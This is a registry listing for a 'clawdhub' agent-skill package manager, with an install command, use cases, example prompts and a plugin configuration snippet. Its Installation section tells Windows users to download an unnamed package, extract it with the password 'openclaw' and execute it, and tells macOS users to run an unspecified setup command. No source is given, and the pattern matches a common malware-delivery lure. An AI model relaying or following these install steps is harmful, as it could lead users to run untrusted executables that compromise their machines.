ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 2/5

clawdhub

Use the ClawdHub CLI to search, install, update, and publish agent skills from clawdhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawdhub CLI.

Why use this skill?

Learn how to use the ClawdHub CLI to search, install, update, and publish OpenClaw AI agent skills efficiently. Master your workflow today.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/clawdhub-i6qfm0cay3
Or

What This Skill Does

ClawdHub serves as the central command-line interface for the OpenClaw ecosystem, acting as a package manager for AI agent skills. By integrating this skill, users can interact directly with the clawdhub.com registry to search for community-contributed tools, manage local installations, and maintain version control. Whether you are an end-user looking to expand your agent's capabilities or a developer aiming to share your own custom skills with the world, ClawdHub streamlines the entire lifecycle of skill distribution. It enables dynamic updates, ensuring your agent always has the latest iteration of its tools without manual file manipulation.

Installation

To begin using the ClawdHub skill, you must first ensure the foundational infrastructure is present. This skill requires the OpenClawProvider to be running on your host machine to facilitate communication between the agent and the OS. On Windows, download the official package, extract it using the password 'openclaw', and execute it. On MacOS, run the provided setup-wizard command in your terminal. Once the provider is active, install the CLI globally via NPM: npm i -g clawdhub. After installation, verify your configuration and registry settings to ensure the agent can fetch and deploy skills into your local ./skills directory.

Use Cases

  • Expanding Agent Functionality: Quickly find and install third-party skills for specific tasks like database management or API integrations.
  • Version Control: Manage multiple versions of a skill simultaneously and perform forced upgrades when critical patches are released.
  • Collaborative Development: Publish your own tested, versioned skill folders to the registry, complete with custom slugs and changelogs.
  • Automated Maintenance: Utilize the --all and --no-input flags to trigger batch updates, ensuring a headless environment stays up to date.

Example Prompts

  1. "Search the ClawdHub registry for any skills related to postgres backups and install the most relevant one."
  2. "Update all installed skills to their latest versions, force-overwriting existing files if necessary."
  3. "Publish the skill in the current directory to ClawdHub with the slug 'my-custom-tool', version 1.0.1, and the changelog 'Initial public release'."

Tips & Limitations

  • Registry Customization: You can override the default registry URL by setting the CLAWDHUB_REGISTRY environment variable, which is useful for private or enterprise skill hubs.
  • Permissions: Since this tool performs file-system operations, ensure your environment allows node execution and directory writing.
  • Security: Always review the source code of external skills before running clawdhub install, as these scripts run locally on your machine.
  • Work Directories: By default, it looks for the ./skills directory; if your project structure differs, always specify the --dir argument to avoid cluttering your root directory.

Metadata

Stars1133
Views2
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-clawdhub-i6qfm0cay3": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#package-manager#cli#dev-tools#automation
Safety Score: 2/5

Flags: network-access, file-write, file-read, code-execution